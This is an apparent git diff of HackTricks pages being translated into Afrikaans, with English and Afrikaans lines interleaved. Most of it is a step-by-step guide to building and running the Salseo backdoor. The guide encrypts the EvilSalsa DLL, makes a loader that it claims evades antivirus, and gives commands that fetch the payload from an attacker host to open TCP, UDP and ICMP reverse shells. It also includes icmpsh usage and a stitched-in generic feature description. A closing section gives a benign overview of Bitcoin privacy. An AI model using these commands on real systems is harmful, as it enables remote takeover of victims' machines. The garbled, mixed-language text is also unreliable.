# **Slagofferkant**
# **Victim Side**
Upload **icmpsh.exe** to the victim and execute:
Laai **icmpsh.exe** op na die slagoffer se rekenaar en voer dit uit:
```bash
icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128
```
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>

162
backdoors/salseo.md
View file

@ -2,171 +2,182 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
## Compiling the binaries
## Kompilering van die binnerwerke
Download the source code from the github and compile **EvilSalsa** and **SalseoLoader**. You will need **Visual Studio** installed to compile the code.
Laai die bronkode van die github af en kompileer **EvilSalsa** en **SalseoLoader**. Jy sal **Visual Studio** geïnstalleer moet hê om die kode te kompileer.
Compile those projects for the architecture of the windows box where your are going to use them(If the Windows supports x64 compile them for that architectures).
Kompileer hierdie projekte vir die argitektuur van die Windows-boks waar jy dit gaan gebruik (As die Windows x64 ondersteun, kompileer dit vir daardie argitekture).
You can **select the architecture** inside Visual Studio in the **left "Build" Tab** in **"Platform Target".**
Jy kan die argitektuur **kies** binne Visual Studio in die **linker "Build" Tab** in **"Platform Target".**
(\*\*If you can't find this options press in **"Project Tab"** and then in **"\<Project Name> Properties"**)
(\*\*As jy hierdie opsies nie kan vind nie, druk op **"Project Tab"** en dan op **"\<Project Name> Properties"**)
![](<../.gitbook/assets/image (132).png>)
Then, build both projects (Build -> Build Solution) (Inside the logs will appear the path of the executable):
Bou dan beide projekte (Build -> Build Solution) (Binne die logs sal die pad van die uitvoerbare lêer verskyn):
![](<../.gitbook/assets/image (1) (2) (1) (1) (1).png>)
## Prepare the Backdoor
## Berei die agterdeur voor
First of all, you will need to encode the **EvilSalsa.dll.** To do so, you can use the python script **encrypterassembly.py** or you can compile the project **EncrypterAssembly**:
Eerstens sal jy die **EvilSalsa.dll** moet enkodeer. Jy kan die Python-skripsie **encrypterassembly.py** gebruik of jy kan die projek **EncrypterAssembly** kompileer:
### **Python**
```
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
```
### Windows
#### Salseo
Salseo is a backdoor that allows remote access to a compromised Windows system. It is commonly used by attackers to maintain persistence and control over the compromised system.
##### Features
- **Remote Access**: Salseo provides remote access to the compromised system, allowing the attacker to execute commands and interact with the system.
- **Persistence**: Salseo is designed to maintain persistence on the compromised system, ensuring that the attacker can regain access even after system reboots.
- **Stealth**: Salseo is designed to operate stealthily, avoiding detection by antivirus software and other security measures.
- **Command Execution**: Salseo allows the attacker to execute arbitrary commands on the compromised system, giving them full control over the system.
- **File Transfer**: Salseo supports file transfer between the attacker's system and the compromised system, allowing the attacker to exfiltrate data or upload additional tools.
- **Keylogging**: Salseo can be configured to log keystrokes on the compromised system, allowing the attacker to capture sensitive information such as passwords.
- **Screenshot Capture**: Salseo can capture screenshots of the compromised system, providing the attacker with visual information about the system's activities.
- **Network Communication**: Salseo communicates with the attacker's system over the network, enabling remote control and data exfiltration.
##### Detection and Mitigation
- **Antivirus Software**: Keep your antivirus software up to date to detect and remove known instances of Salseo.
- **Network Monitoring**: Monitor network traffic for suspicious activity, such as connections to known malicious IP addresses or unusual data transfers.
- **System Hardening**: Implement security best practices, such as disabling unnecessary services, applying patches and updates, and using strong passwords.
- **Behavioral Analysis**: Use behavioral analysis tools to detect abnormal system behavior that may indicate the presence of Salseo.
- **Firewall**: Configure a firewall to block incoming and outgoing connections to known malicious IP addresses or suspicious domains.
- **User Education**: Educate users about the risks of opening suspicious email attachments or clicking on malicious links, as these are common infection vectors for Salseo.
##### Conclusion
Salseo is a powerful backdoor that provides attackers with remote access and control over compromised Windows systems. Detecting and mitigating Salseo requires a combination of proactive security measures, such as antivirus software, network monitoring, system hardening, behavioral analysis, firewall configuration, and user education. By implementing these measures, you can significantly reduce the risk of Salseo infection and protect your systems from unauthorized access.
```
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
```
Ok, nou het jy alles wat jy nodig het om die hele Salseo ding uit te voer: die **gekodeerde EvilDalsa.dll** en die **binêre van SalseoLoader.**
Ok, now you have everything you need to execute all the Salseo thing: the **encoded EvilDalsa.dll** and the **binary of SalseoLoader.**
**Laai die SalseoLoader.exe binêre na die masjien op. Dit behoort nie deur enige AV opgespoor te word nie...**
**Upload the SalseoLoader.exe binary to the machine. They shouldn't be detected by any AV...**
## **Voer die agterdeur uit**
## **Execute the backdoor**
### **Getting a TCP reverse shell (downloading encoded dll through HTTP)**
Remember to start a nc as the reverse shell listener and a HTTP server to serve the encoded evilsalsa.
### **Kry 'n TCP-omgekeerde skulp (deur die gekodeerde dll af te laai deur HTTP)**
Onthou om 'n nc as die omgekeerde skulp luisteraar te begin en 'n HTTP-bediener om die gekodeerde evilsalsa te bedien.
```
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
```
### **Kry 'n UDP omgekeerde dop (laai gekodeerde dll af deur SMB)**
### **Getting a UDP reverse shell (downloading encoded dll through SMB)**
Remember to start a nc as the reverse shell listener, and a SMB server to serve the encoded evilsalsa (impacket-smbserver).
Onthou om 'n nc as die omgekeerde dop luisteraar te begin, en 'n SMB-bediener om die gekodeerde evilsalsa te dien (impacket-smbserver).
```
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
```
### **Kry 'n ICMP omgekeerde dop (geënkripteerde dll reeds binne die slagoffer)**
### **Getting a ICMP reverse shell (encoded dll already inside the victim)**
**This time you need a special tool in the client to receive the reverse shell. Download:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh)
#### **Disable ICMP Replies:**
**Hierdie keer het jy 'n spesiale instrument in die kliënt nodig om die omgekeerde dop te ontvang. Laai af:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh)
#### **Deaktiveer ICMP Antwoorde:**
```
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
```
#### Execute the client:
#### Voer die kliënt uit:
```
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
```
#### Inside the victim, lets execute the salseo thing:
#### Binne die slagoffer, laat ons die salseo ding uitvoer:
```
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
```
## Kompilering van SalseoLoader as DLL wat die hooffunksie uitvoer
## Compiling SalseoLoader as DLL exporting main function
Maak die SalseoLoader-projek oop met behulp van Visual Studio.
Open the SalseoLoader project using Visual Studio.
### Add before the main function: \[DllExport]
### Voeg voor die hooffunksie by: \[DllExport]
![](<../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
### Install DllExport for this project
### Installeer DllExport vir hierdie projek
#### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**
![](<../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
#### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**
#### **Soek na die DllExport-pakket (deur die Browse-tabblad te gebruik) en druk op Installeer (en aanvaar die popup)**
![](<../.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1) (1) (1).png>)
In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat**
In jou projeklêer het die lêers verskyn: **DllExport.bat** en **DllExport\_Configure.bat**
### **U**ninstall DllExport
### **D**eïnstalleer DllExport
Press **Uninstall** (yeah, its weird but trust me, it is necessary)
Druk **Deïnstalleer** (ja, dit is vreemd, maar glo my, dit is nodig)
![](<../.gitbook/assets/image (5) (1) (1) (2) (1).png>)
### **Exit Visual Studio and execute DllExport\_configure**
### **Sluit Visual Studio af en voer DllExport\_configure uit**
Just **exit** Visual Studio
Sluit eenvoudig Visual Studio af
Then, go to your **SalseoLoader folder** and **execute DllExport\_Configure.bat**
Gaan dan na jou **SalseoLoader-lêer** en **voer DllExport\_Configure.bat uit**
Select **x64** (if you are going to use it inside a x64 box, that was my case), select **System.Runtime.InteropServices** (inside **Namespace for DllExport**) and press **Apply**
Kies **x64** (as jy dit binne 'n x64-boks gaan gebruik, dit was my geval), kies **System.Runtime.InteropServices** (binne **Namespace for DllExport**) en druk op **Apply**
![](<../.gitbook/assets/image (7) (1) (1) (1) (1).png>)
### **Open the project again with visual Studio**
### **Maak die projek weer oop met Visual Studio**
**\[DllExport]** should not be longer marked as error
**\[DllExport]** behoort nie meer as 'n fout gemerk te wees nie
![](<../.gitbook/assets/image (8) (1).png>)
### Build the solution
### Bou die oplossing
Select **Output Type = Class Library** (Project --> SalseoLoader Properties --> Application --> Output type = Class Library)
Kies **Output Type = Class Library** (Project --> SalseoLoader Properties --> Application --> Output type = Class Library)
![](<../.gitbook/assets/image (10) (1).png>)
Select **x64** **platform** (Project --> SalseoLoader Properties --> Build --> Platform target = x64)
Kies **x64-platform** (Project --> SalseoLoader Properties --> Build --> Platform target = x64)
![](<../.gitbook/assets/image (9) (1) (1).png>)
To **build** the solution: Build --> Build Solution (Inside the Output console the path of the new DLL will appear)
Om die oplossing te **bou**: Build --> Build Solution (Die pad van die nuwe DLL sal in die Uitvoerkonsole verskyn)
### Test the generated Dll
### Toets die gegenereerde Dll
Copy and paste the Dll where you want to test it.
Execute:
Kopieer en plak die Dll waar jy dit wil toets.
Voer uit:
```
rundll32.exe SalseoLoader.dll,main
```
As geen fout verskyn nie, het jy waarskynlik 'n funksionele DLL!!
If no error appears, probably you have a functional DLL!!
## Kry 'n skul gebruik die DLL
## Get a shell using the DLL
Don't forget to use a **HTTP** **server** and set a **nc** **listener**
Moenie vergeet om 'n **HTTP** **bediener** te gebruik en 'n **nc** **luisteraar** in te stel
### Powershell
```
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
@ -175,9 +186,9 @@ $env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
```
### CMD
CMD (Command Prompt) is 'n opdraggewer wat beskikbaar is op Windows-bedryfstelsels. Dit bied 'n gebruikersvriendelike omgewing waarin gebruikers opdragte kan uitvoer om verskeie take uit te voer. Hierdie opdragte kan gebruik word om sagteware te installeer, lêers te skep en te wysig, netwerkverbindings te bestuur en vele ander funksies uit te voer. CMD is 'n kragtige hulpmiddel wat deur hackers gebruik kan word om toegang tot 'n stelsel te verkry en verskeie aanvalle uit te voer.
```
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
@ -186,17 +197,16 @@ set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
```
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>

214
blockchain/blockchain-and-crypto-currencies/README.md
View file

@ -1,195 +1,189 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
## Basic Concepts
## Basiese Konsepte
- **Smart Contracts** are defined as programs that execute on a blockchain when certain conditions are met, automating agreement executions without intermediaries.
- **Decentralized Applications (dApps)** build upon smart contracts, featuring a user-friendly front-end and a transparent, auditable back-end.
- **Tokens & Coins** differentiate where coins serve as digital money, while tokens represent value or ownership in specific contexts.
- **Utility Tokens** grant access to services, and **Security Tokens** signify asset ownership.
- **DeFi** stands for Decentralized Finance, offering financial services without central authorities.
- **DEX** and **DAOs** refer to Decentralized Exchange Platforms and Decentralized Autonomous Organizations, respectively.
- **Slim Kontrakte** word gedefinieer as programme wat op 'n blokketting uitgevoer word wanneer sekere voorwaardes voldoen word, wat ooreenkomste outomaties sonder tussenpersone uitvoer.
- **Gedentraliseerde Toepassings (dApps)** bou op slim kontrakte, met 'n gebruikersvriendelike voorkant en 'n deursigtige, auditeerbare agterkant.
- **Tokens & Munte** onderskei waar munte as digitale geld dien, terwyl tokens waarde of eienaarskap in spesifieke kontekste verteenwoordig.
- **Hulpmiddel-Tokens** gee toegang tot dienste, en **Sekuriteits-Tokens** dui bateseienaarskap aan.
- **DeFi** staan vir Gedentraliseerde Finansies en bied finansiële dienste sonder sentrale owerhede.
- **DEX** en **DAO's** verwys onderskeidelik na Gedentraliseerde Ruilplatforms en Gedentraliseerde Outonome Organisasies.
## Consensus Mechanisms
## Konsensusmeganismes
Consensus mechanisms ensure secure and agreed transaction validations on the blockchain:
- **Proof of Work (PoW)** relies on computational power for transaction verification.
- **Proof of Stake (PoS)** demands validators to hold a certain amount of tokens, reducing energy consumption compared to PoW.
Konsensusmeganismes verseker veilige en ooreengekome transaksievalidasies op die blokketting:
- **Bewys van Werk (PoW)** steun op rekenaarvermoë vir transaksieverifikasie.
- **Bewys van Aandeel (PoS)** vereis dat valideerders 'n sekere hoeveelheid tokens besit, wat energieverbruik verminder in vergelyking met PoW.
## Bitcoin Essentials
## Bitcoin Essensies
### Transactions
### Transaksies
Bitcoin transactions involve transferring funds between addresses. Transactions are validated through digital signatures, ensuring only the owner of the private key can initiate transfers.
Bitcoin-transaksies behels die oordra van fondse tussen adresse. Transaksies word deur digitale handtekeninge gevalideer, wat verseker dat slegs die eienaar van die privaat sleutel oordragte kan inisieer.
#### Key Components:
#### Sleutelkomponente:
- **Multisignature Transactions** require multiple signatures to authorize a transaction.
- Transactions consist of **inputs** (source of funds), **outputs** (destination), **fees** (paid to miners), and **scripts** (transaction rules).
- **Multisignature-transaksies** vereis meervoudige handtekeninge om 'n transaksie te magtig.
- Transaksies bestaan uit **inskrywings** (bron van fondse), **uitsette** (bestemming), **fooie** (betaal aan myners) en **skripsies** (transaksiereëls).
### Lightning Network
### Lightning-netwerk
Aims to enhance Bitcoin's scalability by allowing multiple transactions within a channel, only broadcasting the final state to the blockchain.
Beoog om die skaalbaarheid van Bitcoin te verbeter deur meervoudige transaksies binne 'n kanaal toe te laat, en slegs die finale toestand na die blokketting uit te saai.
## Bitcoin Privacy Concerns
## Bitcoin-privasiemetodes
Privacy attacks, such as **Common Input Ownership** and **UTXO Change Address Detection**, exploit transaction patterns. Strategies like **Mixers** and **CoinJoin** improve anonymity by obscuring transaction links between users.
Privasiemetodes, soos **Gemeenskaplike Invoereienaarskap** en **UTXO-veranderingsadresopsporing**, maak gebruik van transaksiepatrone. Strategieë soos **Mengers** en **CoinJoin** verbeter anonimiteit deur transaksieskakels tussen gebruikers te verdoesel.
## Acquiring Bitcoins Anonymously
## Anonieme verkryging van Bitcoins
Methods include cash trades, mining, and using mixers. **CoinJoin** mixes multiple transactions to complicate traceability, while **PayJoin** disguises CoinJoins as regular transactions for heightened privacy.
Metodes sluit kontanttransaksies, mynbou en die gebruik van mengers in. **CoinJoin** meng verskeie transaksies om spoorbaarheid te bemoeilik, terwyl **PayJoin** CoinJoins as gewone transaksies vermom vir verhoogde privaatheid.
# Bitcoin Privacy Atacks
# Bitcoin-privasiemetodes
# Summary of Bitcoin Privacy Attacks
# Opsomming van Bitcoin-privasiemetodes
In the world of Bitcoin, the privacy of transactions and the anonymity of users are often subjects of concern. Here's a simplified overview of several common methods through which attackers can compromise Bitcoin privacy.
In die wêreld van Bitcoin is die privaatheid van transaksies en die anonimiteit van gebruikers dikwels onderwerp van kommer. Hier is 'n vereenvoudigde oorsig van verskeie algemene metodes waarmee aanvallers Bitcoin-privasie kan benadeel.
## **Common Input Ownership Assumption**
## **Gemeenskaplike Invoereienaarskap-aanname**
It is generally rare for inputs from different users to be combined in a single transaction due to the complexity involved. Thus, **two input addresses in the same transaction are often assumed to belong to the same owner**.
Dit is oor die algemeen selde dat invoere van verskillende gebruikers in 'n enkele transaksie gekombineer word as gevolg van die betrokkenheid van kompleksiteit. Dus word **twee invoeradresse in dieselfde transaksie dikwels aan dieselfde eienaar toegeskryf**.
## **UTXO Change Address Detection**
## **UTXO-veranderingsadresopsporing**
A UTXO, or **Unspent Transaction Output**, must be entirely spent in a transaction. If only a part of it is sent to another address, the remainder goes to a new change address. Observers can assume this new address belongs to the sender, compromising privacy.
'n UTXO, of **Ongebruikte Transaksie-uitset**, moet heeltemal in 'n transaksie spandeer word. As slegs 'n deel daarvan na 'n ander adres gestuur word, gaan die res na 'n nuwe veranderingsadres. Waarnemers kan aanneem dat hierdie nuwe adres aan die sender behoort, wat privaatheid benadeel.
### Example
To mitigate this, mixing services or using multiple addresses can help obscure ownership.
### Voorbeeld
Om dit te verminder, kan mengdienste of die gebruik van verskeie adresse help om eienaarskap te verdoesel.
## **Social Networks & Forums Exposure**
## **Sosiale Netwerke & Forum Blootstelling**
Users sometimes share their Bitcoin addresses online, making it **easy to link the address to its owner**.
Gebruikers deel soms hul Bitcoin-adresse aanlyn, wat dit **maklik maak om die adres aan sy eienaar te koppel**.
## **Transaction Graph Analysis**
## **Transaksiegrafiekontleding**
Transactions can be visualized as graphs, revealing potential connections between users based on the flow of funds.
Transaksies kan as grafieke voorgestel word, wat potensiële verbindings tussen gebruikers onthul op grond van die vloei van fondse.
## **Unnecessary Input Heuristic (Optimal Change Heuristic)**
## **Onnodige Invoerheuristiek (Optimale Veranderingsheuristiek)**
This heuristic is based on analyzing transactions with multiple inputs and outputs to guess which output is the change returning to the sender.
### Example
Hierdie heuristiek is gebaseer op die analise van transaksies met meervoudige invoere en uitsette om te raai watter uitset die verandering is wat na die sender terugkeer.
### Voorbeeld
```bash
2 btc --> 4 btc
3 btc 1 btc
```
Indien die toevoeging van meer insette die uitset groter maak as enige enkele inset, kan dit die heuristiek in die war bring.
If adding more inputs makes the change output larger than any single input, it can confuse the heuristic.
## **Gedwonge Adres Hergebruik**
## **Forced Address Reuse**
Aanvallers kan klein bedrae na voorheen gebruikte adresse stuur, in die hoop dat die ontvanger dit saam met ander insette in toekomstige transaksies gebruik, en sodoende adresse aan mekaar koppel.
Attackers may send small amounts to previously used addresses, hoping the recipient combines these with other inputs in future transactions, thereby linking addresses together.
### Korrekte Beursiegedrag
Beursies moet voorkom dat munte ontvang op reeds gebruikte, leë adresse om hierdie privaatheidslek te voorkom.
### Correct Wallet Behavior
Wallets should avoid using coins received on already used, empty addresses to prevent this privacy leak.
## **Ander Blockchain Analise Tegnieke**
## **Other Blockchain Analysis Techniques**
- **Presiese Betalingsbedrae:** Transaksies sonder wisselgeld is waarskynlik tussen twee adresse wat deur dieselfde gebruiker besit word.
- **Ronde Getalle:** 'n Ronde getal in 'n transaksie dui daarop dat dit 'n betaling is, met die nie-ronde uitset wat waarskynlik die wisselgeld is.
- **Beursie Vingerafdrukke:** Verskillende beursies het unieke transaksie-skeppingspatrone, wat analiste in staat stel om die gebruikte sagteware en moontlik die wisselgeldadres te identifiseer.
- **Bedrag & Tydsverbande:** Die bekendmaking van transaksie-tye of -bedrae kan transaksies naspeurbaar maak.
- **Exact Payment Amounts:** Transactions without change are likely between two addresses owned by the same user.
- **Round Numbers:** A round number in a transaction suggests it's a payment, with the non-round output likely being the change.
- **Wallet Fingerprinting:** Different wallets have unique transaction creation patterns, allowing analysts to identify the software used and potentially the change address.
- **Amount & Timing Correlations:** Disclosing transaction times or amounts can make transactions traceable.
## **Verkeersanalise**
## **Traffic Analysis**
Deur netwerkverkeer te monitor, kan aanvallers moontlik transaksies of blokke aan IP-adresse koppel, wat die privaatheid van gebruikers in gevaar kan bring. Dit is veral waar as 'n entiteit baie Bitcoin-nodes bedryf, wat hul vermoë om transaksies te monitor verbeter.
By monitoring network traffic, attackers can potentially link transactions or blocks to IP addresses, compromising user privacy. This is especially true if an entity operates many Bitcoin nodes, enhancing their ability to monitor transactions.
## More
For a comprehensive list of privacy attacks and defenses, visit [Bitcoin Privacy on Bitcoin Wiki](https://en.bitcoin.it/wiki/Privacy).
## Meer
Vir 'n omvattende lys van privaatheidsaanvalle en verdedigings, besoek [Bitcoin Privacy op Bitcoin Wiki](https://en.bitcoin.it/wiki/Privacy).
# Anonymous Bitcoin Transactions
# Anonieme Bitcoin Transaksies
## Ways to Get Bitcoins Anonymously
## Maniere om Bitcoins Anoniem te Kry
- **Cash Transactions**: Acquiring bitcoin through cash.
- **Cash Alternatives**: Purchasing gift cards and exchanging them online for bitcoin.
- **Mining**: The most private method to earn bitcoins is through mining, especially when done alone because mining pools may know the miner's IP address. [Mining Pools Information](https://en.bitcoin.it/wiki/Pooled_mining)
- **Theft**: Theoretically, stealing bitcoin could be another method to acquire it anonymously, although it's illegal and not recommended.
- **Kontant Transaksies**: Bitcoin verkry deur kontant.
- **Alternatiewe Kontant**: Aankoop van geskenkkaarte en dit aanlyn ruil vir bitcoin.
- **Mynbou**: Die mees private metode om bitcoins te verdien is deur mynbou, veral wanneer dit alleen gedoen word, omdat mynbou-poele die IP-adres van die mynwerker kan weet. [Mynbou-poele-inligting](https://en.bitcoin.it/wiki/Pooled_mining)
- **Diefstal**: Teoreties kan die steel van bitcoin 'n ander metode wees om dit anoniem te bekom, alhoewel dit onwettig en nie aanbeveel word nie.
## Mixing Services
## Mengdienste
By using a mixing service, a user can **send bitcoins** and receive **different bitcoins in return**, which makes tracing the original owner difficult. Yet, this requires trust in the service not to keep logs and to actually return the bitcoins. Alternative mixing options include Bitcoin casinos.
Deur 'n mengdiens te gebruik, kan 'n gebruiker **bitcoins stuur** en **verskillende bitcoins in ruil ontvang**, wat dit moeilik maak om die oorspronklike eienaar op te spoor. Dit vereis egter vertroue in die diens om nie logboeke te hou en om die bitcoins werklik terug te gee. Alternatiewe mengopsies sluit Bitcoin-casinos in.
## CoinJoin
**CoinJoin** merges multiple transactions from different users into one, complicating the process for anyone trying to match inputs with outputs. Despite its effectiveness, transactions with unique input and output sizes can still potentially be traced.
**CoinJoin** voeg verskeie transaksies van verskillende gebruikers saam in een, wat die proses vir enigeen wat probeer om insette met uitsette te koppel, bemoeilik. Ten spyte van sy doeltreffendheid kan transaksies met unieke inset- en uitsetgroottes steeds potensieel nagespoor word.
